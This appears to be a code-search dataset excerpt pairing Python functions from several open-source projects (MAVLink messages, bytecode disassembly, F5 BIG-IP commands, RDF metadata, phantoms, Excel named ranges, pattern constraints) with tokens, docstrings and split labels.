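def get_country_by_id(country_id):
    if country_id not in countries_by_id:
        for country in countries:            # fallback: linear scan
            if country.country_id == country_id:
                return country
        raise ValueError(country_id)
    return countries_by_id[country_id]

assert get_country_by_id(2).name == "Russia"

Note that the original returns the scan result without back-filling the cache; memoizing it before returning would make repeated misses cheaper.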
JdeRobot/base
src/drivers/MAVLinkServer/MAVProxy/pymavlink/dialects/v10/matrixpilot.py
https://github.com/JdeRobot/base/blob/303b18992785b2fe802212f2d758a60873007f1f/src/drivers/MAVLinkServer/MAVProxy/pymavlink/dialects/v10/matrixpilot.py#L8392-L8409
def serial_udb_extra_f14_send(self, sue_WIND_ESTIMATION, sue_GPS_TYPE, sue_DR, sue_BOARD_TYPE, sue_AIRFRAME, sue_RCON, sue_TRAP_FLAGS, sue_TRAP_SOURCE, sue_osc_fail_count, sue_CLOCK_CONFIG, sue_FLIGHT_PLAN_TYPE, force_mavlink1=False):
    '''
    Backwards compatible version of SERIAL_UDB_EXTRA F14: format

    sue_WIND_ESTIMATION       : Serial UDB Extra Wind Estimation Enabled (uint8_t)
    sue_GPS_TYPE              : Serial UDB Extra Type of GPS Unit (uint8_t)
    sue_DR                    : Serial UDB Extra Dead Reckoning Enabled (uint8_t)
    sue_BOARD_TYPE            : Serial UDB Extra Type of UDB Hardware (uint8_t)
    sue_AIRFRAME              : Serial UDB Extra Type of Airframe (uint8_t)
    sue_RCON                  : Serial UDB Extra Reboot Register of DSPIC (int16_t)
    sue_TRAP_FLAGS            : Serial UDB Extra Last dspic Trap Flags (int16_t)
    sue_TRAP_SOURCE           : Serial UDB Extra Type Program Address of Last Trap (uint32_t)
    sue_osc_fail_count        : Serial UDB Extra Number of Oscillator Failures (int16_t)
    sue_CLOCK_CONFIG          : Serial UDB Extra UDB Internal Clock Configuration (uint8_t)
    sue_FLIGHT_PLAN_TYPE      : Serial UDB Extra Type of Flight Plan (uint8_t)

    '''
    return self.send(self.serial_udb_extra_f14_encode(sue_WIND_ESTIMATION, sue_GPS_TYPE, sue_DR, sue_BOARD_TYPE, sue_AIRFRAME, sue_RCON, sue_TRAP_FLAGS, sue_TRAP_SOURCE, sue_osc_fail_count, sue_CLOCK_CONFIG, sue_FLIGHT_PLAN_TYPE), force_mavlink1=force_mavlink1)
[ "def", "serial_udb_extra_f14_send", "(", "self", ",", "sue_WIND_ESTIMATION", ",", "sue_GPS_TYPE", ",", "sue_DR", ",", "sue_BOARD_TYPE", ",", "sue_AIRFRAME", ",", "sue_RCON", ",", "sue_TRAP_FLAGS", ",", "sue_TRAP_SOURCE", ",", "sue_osc_fail_count", ",", "sue_CLOCK_CONFIG", ",", "sue_FLIGHT_PLAN_TYPE", ",", "force_mavlink1", "=", "False", ")", ":", "return", "self", ".", "send", "(", "self", ".", "serial_udb_extra_f14_encode", "(", "sue_WIND_ESTIMATION", ",", "sue_GPS_TYPE", ",", "sue_DR", ",", "sue_BOARD_TYPE", ",", "sue_AIRFRAME", ",", "sue_RCON", ",", "sue_TRAP_FLAGS", ",", "sue_TRAP_SOURCE", ",", "sue_osc_fail_count", ",", "sue_CLOCK_CONFIG", ",", "sue_FLIGHT_PLAN_TYPE", ")", ",", "force_mavlink1", "=", "force_mavlink1", ")" ]
Backwards compatible version of SERIAL_UDB_EXTRA F14: format sue_WIND_ESTIMATION : Serial UDB Extra Wind Estimation Enabled (uint8_t) sue_GPS_TYPE : Serial UDB Extra Type of GPS Unit (uint8_t) sue_DR : Serial UDB Extra Dead Reckoning Enabled (uint8_t) sue_BOARD_TYPE : Serial UDB Extra Type of UDB Hardware (uint8_t) sue_AIRFRAME : Serial UDB Extra Type of Airframe (uint8_t) sue_RCON : Serial UDB Extra Reboot Register of DSPIC (int16_t) sue_TRAP_FLAGS : Serial UDB Extra Last dspic Trap Flags (int16_t) sue_TRAP_SOURCE : Serial UDB Extra Type Program Address of Last Trap (uint32_t) sue_osc_fail_count : Serial UDB Extra Number of Oscillator Failures (int16_t) sue_CLOCK_CONFIG : Serial UDB Extra UDB Internal Clock Configuration (uint8_t) sue_FLIGHT_PLAN_TYPE : Serial UDB Extra Type of Flight Plan (uint8_t)
[ "Backwards", "compatible", "version", "of", "SERIAL_UDB_EXTRA", "F14", ":", "format" ]
python
train
apple/turicreate
src/unity/python/turicreate/meta/decompiler/disassemble.py
https://github.com/apple/turicreate/blob/74514c3f99e25b46f22c6e02977fe3da69221c2e/src/unity/python/turicreate/meta/decompiler/disassemble.py#L29-L92
def print_code(co, lasti= -1, level=0): """Disassemble a code object.""" code = co.co_code for constant in co.co_consts: print( '| |' * level, end=' ') print( 'constant:', constant) labels = findlabels(code) linestarts = dict(findlinestarts(co)) n = len(code) i = 0 extended_arg = 0 free = None while i < n: have_inner = False c = code[i] op = co_ord(c) if i in linestarts: if i > 0: print() print( '| |' * level, end=' ') print( "%3d" % linestarts[i], end=' ') else: print( '| |' * level, end=' ') print(' ', end=' ') if i == lasti: print( '-->',end=' ') else: print( ' ', end=' ') if i in labels: print( '>>', end=' ') else: print( ' ',end=' ') print(repr(i).rjust(4), end=' ') print(opcode.opname[op].ljust(20), end=' ') i = i + 1 if op >= opcode.HAVE_ARGUMENT: oparg = co_ord(code[i]) + co_ord(code[i + 1]) * 256 + extended_arg extended_arg = 0 i = i + 2 if op == opcode.EXTENDED_ARG: extended_arg = oparg * 65536 print( repr(oparg).rjust(5), end=' ') if op in opcode.hasconst: print( '(' + repr(co.co_consts[oparg]) + ')', end=' ') if type(co.co_consts[oparg]) == types.CodeType: have_inner = co.co_consts[oparg] elif op in opcode.hasname: print( '(' + co.co_names[oparg] + ')',end=' ') elif op in opcode.hasjrel: print('(to ' + repr(i + oparg) + ')', end=' ') elif op in opcode.haslocal: print('(' + co.co_varnames[oparg] + ')', end=' ') elif op in opcode.hascompare: print('(' + opcode.cmp_op[oparg] + ')', end=' ') elif op in opcode.hasfree: if free is None: free = co.co_cellvars + co.co_freevars print('(' + free[oparg] + ')', end=' ') print() if have_inner is not False: print_code(have_inner, level=level + 1)
[ "def", "print_code", "(", "co", ",", "lasti", "=", "-", "1", ",", "level", "=", "0", ")", ":", "code", "=", "co", ".", "co_code", "for", "constant", "in", "co", ".", "co_consts", ":", "print", "(", "'| |'", "*", "level", ",", "end", "=", "' '", ")", "print", "(", "'constant:'", ",", "constant", ")", "labels", "=", "findlabels", "(", "code", ")", "linestarts", "=", "dict", "(", "findlinestarts", "(", "co", ")", ")", "n", "=", "len", "(", "code", ")", "i", "=", "0", "extended_arg", "=", "0", "free", "=", "None", "while", "i", "<", "n", ":", "have_inner", "=", "False", "c", "=", "code", "[", "i", "]", "op", "=", "co_ord", "(", "c", ")", "if", "i", "in", "linestarts", ":", "if", "i", ">", "0", ":", "print", "(", ")", "print", "(", "'| |'", "*", "level", ",", "end", "=", "' '", ")", "print", "(", "\"%3d\"", "%", "linestarts", "[", "i", "]", ",", "end", "=", "' '", ")", "else", ":", "print", "(", "'| |'", "*", "level", ",", "end", "=", "' '", ")", "print", "(", "' '", ",", "end", "=", "' '", ")", "if", "i", "==", "lasti", ":", "print", "(", "'-->'", ",", "end", "=", "' '", ")", "else", ":", "print", "(", "' '", ",", "end", "=", "' '", ")", "if", "i", "in", "labels", ":", "print", "(", "'>>'", ",", "end", "=", "' '", ")", "else", ":", "print", "(", "' '", ",", "end", "=", "' '", ")", "print", "(", "repr", "(", "i", ")", ".", "rjust", "(", "4", ")", ",", "end", "=", "' '", ")", "print", "(", "opcode", ".", "opname", "[", "op", "]", ".", "ljust", "(", "20", ")", ",", "end", "=", "' '", ")", "i", "=", "i", "+", "1", "if", "op", ">=", "opcode", ".", "HAVE_ARGUMENT", ":", "oparg", "=", "co_ord", "(", "code", "[", "i", "]", ")", "+", "co_ord", "(", "code", "[", "i", "+", "1", "]", ")", "*", "256", "+", "extended_arg", "extended_arg", "=", "0", "i", "=", "i", "+", "2", "if", "op", "==", "opcode", ".", "EXTENDED_ARG", ":", "extended_arg", "=", "oparg", "*", "65536", "print", "(", "repr", "(", "oparg", ")", ".", "rjust", "(", "5", ")", ",", "end", "=", "' '", ")", "if", "op", "in", "opcode", ".", "hasconst", ":", "print", "(", "'('", "+", "repr", "(", "co", ".", "co_consts", "[", "oparg", "]", ")", "+", "')'", ",", "end", "=", "' '", ")", "if", "type", "(", "co", ".", "co_consts", "[", "oparg", "]", ")", "==", "types", ".", "CodeType", ":", "have_inner", "=", "co", ".", "co_consts", "[", "oparg", "]", "elif", "op", "in", "opcode", ".", "hasname", ":", "print", "(", "'('", "+", "co", ".", "co_names", "[", "oparg", "]", "+", "')'", ",", "end", "=", "' '", ")", "elif", "op", "in", "opcode", ".", "hasjrel", ":", "print", "(", "'(to '", "+", "repr", "(", "i", "+", "oparg", ")", "+", "')'", ",", "end", "=", "' '", ")", "elif", "op", "in", "opcode", ".", "haslocal", ":", "print", "(", "'('", "+", "co", ".", "co_varnames", "[", "oparg", "]", "+", "')'", ",", "end", "=", "' '", ")", "elif", "op", "in", "opcode", ".", "hascompare", ":", "print", "(", "'('", "+", "opcode", ".", "cmp_op", "[", "oparg", "]", "+", "')'", ",", "end", "=", "' '", ")", "elif", "op", "in", "opcode", ".", "hasfree", ":", "if", "free", "is", "None", ":", "free", "=", "co", ".", "co_cellvars", "+", "co", ".", "co_freevars", "print", "(", "'('", "+", "free", "[", "oparg", "]", "+", "')'", ",", "end", "=", "' '", ")", "print", "(", ")", "if", "have_inner", "is", "not", "False", ":", "print_code", "(", "have_inner", ",", "level", "=", "level", "+", "1", ")" ]
Disassemble a code object.
[ "Disassemble", "a", "code", "object", "." ]
python
train
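The standard library's dis module can produce the same recursive dump without the module-private helpers (co_ord, findlabels, findlinestarts); the following is a dis-based equivalent, not turicreate's code:

import dis
import types

def dump_code(co, level=0):
    indent = "| |" * level
    for constant in co.co_consts:
        print(indent, "constant:", constant)
    for line in dis.Bytecode(co).dis().splitlines():
        print(indent, line)
    for constant in co.co_consts:       # recurse into nested code objects
        if isinstance(constant, types.CodeType):
            dump_code(constant, level + 1)

co = compile("def inner(x):\n    return x + 1\n", "<demo>", "exec")
dump_code(co)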
F5Networks/f5-common-python
f5/bigip/mixins.py
https://github.com/F5Networks/f5-common-python/blob/7e67d5acd757a60e3d5f8c88c534bd72208f5494/f5/bigip/mixins.py#L243-L263
def _exec_cmd(self, command, **kwargs):
    """Create a new method as command has specific requirements.

    Only a handful of TMSH global commands are supported, so this
    method requires the command as a parameter.

    :raises: InvalidCommand
    """

    kwargs['command'] = command
    self._check_exclusive_parameters(**kwargs)
    requests_params = self._handle_requests_params(kwargs)
    session = self._meta_data['bigip']._meta_data['icr_session']
    response = session.post(
        self._meta_data['uri'],
        json=kwargs, **requests_params)
    new_instance = self._stamp_out_core()
    new_instance._local_update(response.json())
    if 'commandResult' in new_instance.__dict__:
        new_instance._check_command_result()
    return new_instance
[ "def", "_exec_cmd", "(", "self", ",", "command", ",", "*", "*", "kwargs", ")", ":", "kwargs", "[", "'command'", "]", "=", "command", "self", ".", "_check_exclusive_parameters", "(", "*", "*", "kwargs", ")", "requests_params", "=", "self", ".", "_handle_requests_params", "(", "kwargs", ")", "session", "=", "self", ".", "_meta_data", "[", "'bigip'", "]", ".", "_meta_data", "[", "'icr_session'", "]", "response", "=", "session", ".", "post", "(", "self", ".", "_meta_data", "[", "'uri'", "]", ",", "json", "=", "kwargs", ",", "*", "*", "requests_params", ")", "new_instance", "=", "self", ".", "_stamp_out_core", "(", ")", "new_instance", ".", "_local_update", "(", "response", ".", "json", "(", ")", ")", "if", "'commandResult'", "in", "new_instance", ".", "__dict__", ":", "new_instance", ".", "_check_command_result", "(", ")", "return", "new_instance" ]
Create a new method as command has specific requirements. Only a handful of TMSH global commands are supported, so this method requires the command as a parameter. :raises: InvalidCommand
[ "Create", "a", "new", "method", "as", "command", "has", "specific", "requirements", "." ]
python
train
Capitains/MyCapytain
MyCapytain/common/metadata.py
https://github.com/Capitains/MyCapytain/blob/b11bbf6b6ae141fc02be70471e3fbf6907be6593/MyCapytain/common/metadata.py#L72-L87
def add(self, key, value, lang=None): """ Add a triple to the graph related to this node :param key: Predicate of the triple :param value: Object of the triple :param lang: Language of the triple if applicable """ if not isinstance(value, Literal) and lang is not None: value = Literal(value, lang=lang) elif not isinstance(value, (BNode, URIRef)): value, _type = term._castPythonToLiteral(value) if _type is None: value = Literal(value) else: value = Literal(value, datatype=_type) self.graph.add((self.asNode(), key, value))
[ "def", "add", "(", "self", ",", "key", ",", "value", ",", "lang", "=", "None", ")", ":", "if", "not", "isinstance", "(", "value", ",", "Literal", ")", "and", "lang", "is", "not", "None", ":", "value", "=", "Literal", "(", "value", ",", "lang", "=", "lang", ")", "elif", "not", "isinstance", "(", "value", ",", "(", "BNode", ",", "URIRef", ")", ")", ":", "value", ",", "_type", "=", "term", ".", "_castPythonToLiteral", "(", "value", ")", "if", "_type", "is", "None", ":", "value", "=", "Literal", "(", "value", ")", "else", ":", "value", "=", "Literal", "(", "value", ",", "datatype", "=", "_type", ")", "self", ".", "graph", ".", "add", "(", "(", "self", ".", "asNode", "(", ")", ",", "key", ",", "value", ")", ")" ]
Add a triple to the graph related to this node :param key: Predicate of the triple :param value: Object of the triple :param lang: Language of the triple if applicable
[ "Add", "a", "triple", "to", "the", "graph", "related", "to", "this", "node" ]
python
train
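The coercion rules can be observed with rdflib directly; since term._castPythonToLiteral is a private rdflib helper, this sketch sticks to the public Literal constructor, which applies comparable datatype inference:

from rdflib import Graph, Literal, Namespace, URIRef

DC = Namespace("http://purl.org/dc/elements/1.1/")
g = Graph()
node = URIRef("urn:example:text1")                           # placeholder subject

g.add((node, DC.title, Literal("Epigrammata", lang="la")))   # language-tagged literal
g.add((node, DC.date, Literal(103)))                         # datatype inferred (xsd:integer)

for s, p, o in g:
    print(p, repr(o))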
odlgroup/odl
odl/phantom/geometric.py
https://github.com/odlgroup/odl/blob/b8443f6aca90e191ba36c91d32253c5a36249a6c/odl/phantom/geometric.py#L706-L764
def smooth_cuboid(space, min_pt=None, max_pt=None, axis=0): """Cuboid with smooth variations. Parameters ---------- space : `DiscreteLp` Discretized space in which the phantom is supposed to be created. min_pt : array-like of shape ``(space.ndim,)``, optional Lower left corner of the cuboid. If ``None`` is given, a quarter of the extent from ``space.min_pt`` towards the inside is chosen. max_pt : array-like of shape ``(space.ndim,)``, optional Upper right corner of the cuboid. If ``None`` is given, ``min_pt`` plus half the extent is chosen. axis : int or sequence of int Dimension(s) along which the smooth variation should happen. Returns ------- phantom : ``space``-element The generated cuboid phantom in ``space``. Values have range [0, 1]. """ dom_min_pt = space.domain.min() dom_max_pt = space.domain.max() if min_pt is None: min_pt = dom_min_pt * 0.75 + dom_max_pt * 0.25 if max_pt is None: max_pt = dom_min_pt * 0.25 + dom_max_pt * 0.75 min_pt = np.atleast_1d(min_pt) max_pt = np.atleast_1d(max_pt) axis = np.array(axis, dtype=int, ndmin=1) if min_pt.shape != (space.ndim,): raise ValueError('shape of `min_pt` must be {}, got {}' ''.format((space.ndim,), min_pt.shape)) if max_pt.shape != (space.ndim,): raise ValueError('shape of `max_pt` must be {}, got {}' ''.format((space.ndim,), max_pt.shape)) sign = 0 for i, coord in enumerate(space.meshgrid): sign = sign | (coord < min_pt[i]) | (coord > max_pt[i]) values = 0 for i in axis: coord = space.meshgrid[i] extent = (dom_max_pt[i] - dom_min_pt[i]) values = values + 2 * (coord - dom_min_pt[i]) / extent - 1 # Properly scale using sign sign = (3 * sign - 2) / axis.size # Fit in [0, 1] values = values * sign values = (values - np.min(values)) / (np.max(values) - np.min(values)) return space.element(values)
[ "def", "smooth_cuboid", "(", "space", ",", "min_pt", "=", "None", ",", "max_pt", "=", "None", ",", "axis", "=", "0", ")", ":", "dom_min_pt", "=", "space", ".", "domain", ".", "min", "(", ")", "dom_max_pt", "=", "space", ".", "domain", ".", "max", "(", ")", "if", "min_pt", "is", "None", ":", "min_pt", "=", "dom_min_pt", "*", "0.75", "+", "dom_max_pt", "*", "0.25", "if", "max_pt", "is", "None", ":", "max_pt", "=", "dom_min_pt", "*", "0.25", "+", "dom_max_pt", "*", "0.75", "min_pt", "=", "np", ".", "atleast_1d", "(", "min_pt", ")", "max_pt", "=", "np", ".", "atleast_1d", "(", "max_pt", ")", "axis", "=", "np", ".", "array", "(", "axis", ",", "dtype", "=", "int", ",", "ndmin", "=", "1", ")", "if", "min_pt", ".", "shape", "!=", "(", "space", ".", "ndim", ",", ")", ":", "raise", "ValueError", "(", "'shape of `min_pt` must be {}, got {}'", "''", ".", "format", "(", "(", "space", ".", "ndim", ",", ")", ",", "min_pt", ".", "shape", ")", ")", "if", "max_pt", ".", "shape", "!=", "(", "space", ".", "ndim", ",", ")", ":", "raise", "ValueError", "(", "'shape of `max_pt` must be {}, got {}'", "''", ".", "format", "(", "(", "space", ".", "ndim", ",", ")", ",", "max_pt", ".", "shape", ")", ")", "sign", "=", "0", "for", "i", ",", "coord", "in", "enumerate", "(", "space", ".", "meshgrid", ")", ":", "sign", "=", "sign", "|", "(", "coord", "<", "min_pt", "[", "i", "]", ")", "|", "(", "coord", ">", "max_pt", "[", "i", "]", ")", "values", "=", "0", "for", "i", "in", "axis", ":", "coord", "=", "space", ".", "meshgrid", "[", "i", "]", "extent", "=", "(", "dom_max_pt", "[", "i", "]", "-", "dom_min_pt", "[", "i", "]", ")", "values", "=", "values", "+", "2", "*", "(", "coord", "-", "dom_min_pt", "[", "i", "]", ")", "/", "extent", "-", "1", "# Properly scale using sign", "sign", "=", "(", "3", "*", "sign", "-", "2", ")", "/", "axis", ".", "size", "# Fit in [0, 1]", "values", "=", "values", "*", "sign", "values", "=", "(", "values", "-", "np", ".", "min", "(", "values", ")", ")", "/", "(", "np", ".", "max", "(", "values", ")", "-", "np", ".", "min", "(", "values", ")", ")", "return", "space", ".", "element", "(", "values", ")" ]
Cuboid with smooth variations. Parameters ---------- space : `DiscreteLp` Discretized space in which the phantom is supposed to be created. min_pt : array-like of shape ``(space.ndim,)``, optional Lower left corner of the cuboid. If ``None`` is given, a quarter of the extent from ``space.min_pt`` towards the inside is chosen. max_pt : array-like of shape ``(space.ndim,)``, optional Upper right corner of the cuboid. If ``None`` is given, ``min_pt`` plus half the extent is chosen. axis : int or sequence of int Dimension(s) along which the smooth variation should happen. Returns ------- phantom : ``space``-element The generated cuboid phantom in ``space``. Values have range [0, 1].
[ "Cuboid", "with", "smooth", "variations", "." ]
python
train
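The sign/ramp construction needs nothing from odl; this NumPy-only sketch reproduces it on a 2-d unit square with one smooth axis (so axis.size is 1 and the scaling step simplifies):

import numpy as np

x, y = np.meshgrid(np.linspace(0, 1, 200), np.linspace(0, 1, 200),
                   indexing="ij", sparse=True)
min_pt, max_pt = (0.25, 0.25), (0.75, 0.75)

# True outside the cuboid, False inside (the `sign` mask above)
outside = (x < min_pt[0]) | (x > max_pt[0]) | (y < min_pt[1]) | (y > max_pt[1])

values = 2 * x - 1            # smooth ramp along axis 0, range [-1, 1]
scale = 3 * outside - 2       # inside -> -2, outside -> +1
values = values * scale
values = (values - values.min()) / (values.max() - values.min())
assert values.min() == 0.0 and values.max() == 1.0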
O365/python-o365
O365/excel.py
https://github.com/O365/python-o365/blob/02a71cf3775cc6a3c042e003365d6a07c8c75a73/O365/excel.py#L1613-L1634
def add_named_range(self, name, reference, comment='', is_formula=False): """ Adds a new name to the collection of the given scope using the user's locale for the formula :param str name: the name of this range :param str reference: the reference for this range or formula :param str comment: a comment to describe this named range :param bool is_formula: True if the reference is a formula :return: NamedRange instance """ if is_formula: url = self.build_url(self._endpoints.get('add_named_range_f')) else: url = self.build_url(self._endpoints.get('add_named_range')) params = { 'name': name, 'reference': reference, 'comment': comment } response = self.session.post(url, data=params) if not response: return None return self.named_range_constructor(parent=self, **{self._cloud_data_key: response.json()})
[ "def", "add_named_range", "(", "self", ",", "name", ",", "reference", ",", "comment", "=", "''", ",", "is_formula", "=", "False", ")", ":", "if", "is_formula", ":", "url", "=", "self", ".", "build_url", "(", "self", ".", "_endpoints", ".", "get", "(", "'add_named_range_f'", ")", ")", "else", ":", "url", "=", "self", ".", "build_url", "(", "self", ".", "_endpoints", ".", "get", "(", "'add_named_range'", ")", ")", "params", "=", "{", "'name'", ":", "name", ",", "'reference'", ":", "reference", ",", "'comment'", ":", "comment", "}", "response", "=", "self", ".", "session", ".", "post", "(", "url", ",", "data", "=", "params", ")", "if", "not", "response", ":", "return", "None", "return", "self", ".", "named_range_constructor", "(", "parent", "=", "self", ",", "*", "*", "{", "self", ".", "_cloud_data_key", ":", "response", ".", "json", "(", ")", "}", ")" ]
Adds a new name to the collection of the given scope using the user's locale for the formula :param str name: the name of this range :param str reference: the reference for this range or formula :param str comment: a comment to describe this named range :param bool is_formula: True if the reference is a formula :return: NamedRange instance
[ "Adds", "a", "new", "name", "to", "the", "collection", "of", "the", "given", "scope", "using", "the", "user", "s", "locale", "for", "the", "formula", ":", "param", "str", "name", ":", "the", "name", "of", "this", "range", ":", "param", "str", "reference", ":", "the", "reference", "for", "this", "range", "or", "formula", ":", "param", "str", "comment", ":", "a", "comment", "to", "describe", "this", "named", "range", ":", "param", "bool", "is_formula", ":", "True", "if", "the", "reference", "is", "a", "formula", ":", "return", ":", "NamedRange", "instance" ]
python
train
JdeRobot/base
src/drivers/MAVLinkServer/MAVProxy/pymavlink/dialects/v10/matrixpilot.py
https://github.com/JdeRobot/base/blob/303b18992785b2fe802212f2d758a60873007f1f/src/drivers/MAVLinkServer/MAVProxy/pymavlink/dialects/v10/matrixpilot.py#L12161-L12174
def terrain_report_encode(self, lat, lon, spacing, terrain_height, current_height, pending, loaded): ''' Response from a TERRAIN_CHECK request lat : Latitude (degrees *10^7) (int32_t) lon : Longitude (degrees *10^7) (int32_t) spacing : grid spacing (zero if terrain at this location unavailable) (uint16_t) terrain_height : Terrain height in meters AMSL (float) current_height : Current vehicle height above lat/lon terrain height (meters) (float) pending : Number of 4x4 terrain blocks waiting to be received or read from disk (uint16_t) loaded : Number of 4x4 terrain blocks in memory (uint16_t) ''' return MAVLink_terrain_report_message(lat, lon, spacing, terrain_height, current_height, pending, loaded)
[ "def", "terrain_report_encode", "(", "self", ",", "lat", ",", "lon", ",", "spacing", ",", "terrain_height", ",", "current_height", ",", "pending", ",", "loaded", ")", ":", "return", "MAVLink_terrain_report_message", "(", "lat", ",", "lon", ",", "spacing", ",", "terrain_height", ",", "current_height", ",", "pending", ",", "loaded", ")" ]
Response from a TERRAIN_CHECK request lat : Latitude (degrees *10^7) (int32_t) lon : Longitude (degrees *10^7) (int32_t) spacing : grid spacing (zero if terrain at this location unavailable) (uint16_t) terrain_height : Terrain height in meters AMSL (float) current_height : Current vehicle height above lat/lon terrain height (meters) (float) pending : Number of 4x4 terrain blocks waiting to be received or read from disk (uint16_t) loaded : Number of 4x4 terrain blocks in memory (uint16_t)
[ "Response", "from", "a", "TERRAIN_CHECK", "request" ]
python
train
markuskiller/textblob-de
textblob_de/ext/_pattern/text/search.py
https://github.com/markuskiller/textblob-de/blob/1b427b2cdd7e5e9fd3697677a98358fae4aa6ad1/textblob_de/ext/_pattern/text/search.py#L487-L546
def fromstring(cls, s, **kwargs): """ Returns a new Constraint from the given string. Uppercase words indicate either a tag ("NN", "JJ", "VP") or a taxonomy term (e.g., "PRODUCT", "PERSON"). Syntax: ( defines an optional constraint, e.g., "(JJ)". [ defines a constraint with spaces, e.g., "[Mac OS X | Windows Vista]". _ is converted to spaces, e.g., "Windows_Vista". | separates different options, e.g., "ADJP|ADVP". ! can be used as a word prefix to disallow it. * can be used as a wildcard character, e.g., "soft*|JJ*". ? as a suffix defines a constraint that is optional, e.g., "JJ?". + as a suffix defines a constraint that can span multiple words, e.g., "JJ+". ^ as a prefix defines a constraint that can only match the first word. These characters need to be escaped if used as content: "\(". """ C = cls(**kwargs) s = s.strip() s = s.strip("{}") s = s.strip() for i in range(3): # Wrapping order of control characters is ignored: # (NN+) == (NN)+ == NN?+ == NN+? == [NN+?] == [NN]+? if s.startswith("^"): s = s[1: ]; C.first = True if s.endswith("+") and not s.endswith("\+"): s = s[0:-1]; C.multiple = True if s.endswith("?") and not s.endswith("\?"): s = s[0:-1]; C.optional = True if s.startswith("(") and s.endswith(")"): s = s[1:-1]; C.optional = True if s.startswith("[") and s.endswith("]"): s = s[1:-1] s = re.sub(r"^\\\^", "^", s) s = re.sub(r"\\\+$", "+", s) s = s.replace("\_", "&uscore;") s = s.replace("_"," ") s = s.replace("&uscore;", "_") s = s.replace("&lparen;", "(") s = s.replace("&rparen;", ")") s = s.replace("&lbrack;", "[") s = s.replace("&rbrack;", "]") s = s.replace("&lcurly;", "{") s = s.replace("&rcurly;", "}") s = s.replace("\(", "(") s = s.replace("\)", ")") s = s.replace("\[", "[") s = s.replace("\]", "]") s = s.replace("\{", "{") s = s.replace("\}", "}") s = s.replace("\*", "*") s = s.replace("\?", "?") s = s.replace("\+", "+") s = s.replace("\^", "^") s = s.replace("\|", "&vdash;") s = s.split("|") s = [v.replace("&vdash;", "|").strip() for v in s] for v in s: C._append(v) return C
[ "def", "fromstring", "(", "cls", ",", "s", ",", "*", "*", "kwargs", ")", ":", "C", "=", "cls", "(", "*", "*", "kwargs", ")", "s", "=", "s", ".", "strip", "(", ")", "s", "=", "s", ".", "strip", "(", "\"{}\"", ")", "s", "=", "s", ".", "strip", "(", ")", "for", "i", "in", "range", "(", "3", ")", ":", "# Wrapping order of control characters is ignored:", "# (NN+) == (NN)+ == NN?+ == NN+? == [NN+?] == [NN]+?", "if", "s", ".", "startswith", "(", "\"^\"", ")", ":", "s", "=", "s", "[", "1", ":", "]", "C", ".", "first", "=", "True", "if", "s", ".", "endswith", "(", "\"+\"", ")", "and", "not", "s", ".", "endswith", "(", "\"\\+\"", ")", ":", "s", "=", "s", "[", "0", ":", "-", "1", "]", "C", ".", "multiple", "=", "True", "if", "s", ".", "endswith", "(", "\"?\"", ")", "and", "not", "s", ".", "endswith", "(", "\"\\?\"", ")", ":", "s", "=", "s", "[", "0", ":", "-", "1", "]", "C", ".", "optional", "=", "True", "if", "s", ".", "startswith", "(", "\"(\"", ")", "and", "s", ".", "endswith", "(", "\")\"", ")", ":", "s", "=", "s", "[", "1", ":", "-", "1", "]", "C", ".", "optional", "=", "True", "if", "s", ".", "startswith", "(", "\"[\"", ")", "and", "s", ".", "endswith", "(", "\"]\"", ")", ":", "s", "=", "s", "[", "1", ":", "-", "1", "]", "s", "=", "re", ".", "sub", "(", "r\"^\\\\\\^\"", ",", "\"^\"", ",", "s", ")", "s", "=", "re", ".", "sub", "(", "r\"\\\\\\+$\"", ",", "\"+\"", ",", "s", ")", "s", "=", "s", ".", "replace", "(", "\"\\_\"", ",", "\"&uscore;\"", ")", "s", "=", "s", ".", "replace", "(", "\"_\"", ",", "\" \"", ")", "s", "=", "s", ".", "replace", "(", "\"&uscore;\"", ",", "\"_\"", ")", "s", "=", "s", ".", "replace", "(", "\"&lparen;\"", ",", "\"(\"", ")", "s", "=", "s", ".", "replace", "(", "\"&rparen;\"", ",", "\")\"", ")", "s", "=", "s", ".", "replace", "(", "\"&lbrack;\"", ",", "\"[\"", ")", "s", "=", "s", ".", "replace", "(", "\"&rbrack;\"", ",", "\"]\"", ")", "s", "=", "s", ".", "replace", "(", "\"&lcurly;\"", ",", "\"{\"", ")", "s", "=", "s", ".", "replace", "(", "\"&rcurly;\"", ",", "\"}\"", ")", "s", "=", "s", ".", "replace", "(", "\"\\(\"", ",", "\"(\"", ")", "s", "=", "s", ".", "replace", "(", "\"\\)\"", ",", "\")\"", ")", "s", "=", "s", ".", "replace", "(", "\"\\[\"", ",", "\"[\"", ")", "s", "=", "s", ".", "replace", "(", "\"\\]\"", ",", "\"]\"", ")", "s", "=", "s", ".", "replace", "(", "\"\\{\"", ",", "\"{\"", ")", "s", "=", "s", ".", "replace", "(", "\"\\}\"", ",", "\"}\"", ")", "s", "=", "s", ".", "replace", "(", "\"\\*\"", ",", "\"*\"", ")", "s", "=", "s", ".", "replace", "(", "\"\\?\"", ",", "\"?\"", ")", "s", "=", "s", ".", "replace", "(", "\"\\+\"", ",", "\"+\"", ")", "s", "=", "s", ".", "replace", "(", "\"\\^\"", ",", "\"^\"", ")", "s", "=", "s", ".", "replace", "(", "\"\\|\"", ",", "\"&vdash;\"", ")", "s", "=", "s", ".", "split", "(", "\"|\"", ")", "s", "=", "[", "v", ".", "replace", "(", "\"&vdash;\"", ",", "\"|\"", ")", ".", "strip", "(", ")", "for", "v", "in", "s", "]", "for", "v", "in", "s", ":", "C", ".", "_append", "(", "v", ")", "return", "C" ]
Returns a new Constraint from the given string. Uppercase words indicate either a tag ("NN", "JJ", "VP") or a taxonomy term (e.g., "PRODUCT", "PERSON"). Syntax: ( defines an optional constraint, e.g., "(JJ)". [ defines a constraint with spaces, e.g., "[Mac OS X | Windows Vista]". _ is converted to spaces, e.g., "Windows_Vista". | separates different options, e.g., "ADJP|ADVP". ! can be used as a word prefix to disallow it. * can be used as a wildcard character, e.g., "soft*|JJ*". ? as a suffix defines a constraint that is optional, e.g., "JJ?". + as a suffix defines a constraint that can span multiple words, e.g., "JJ+". ^ as a prefix defines a constraint that can only match the first word. These characters need to be escaped if used as content: "\(".
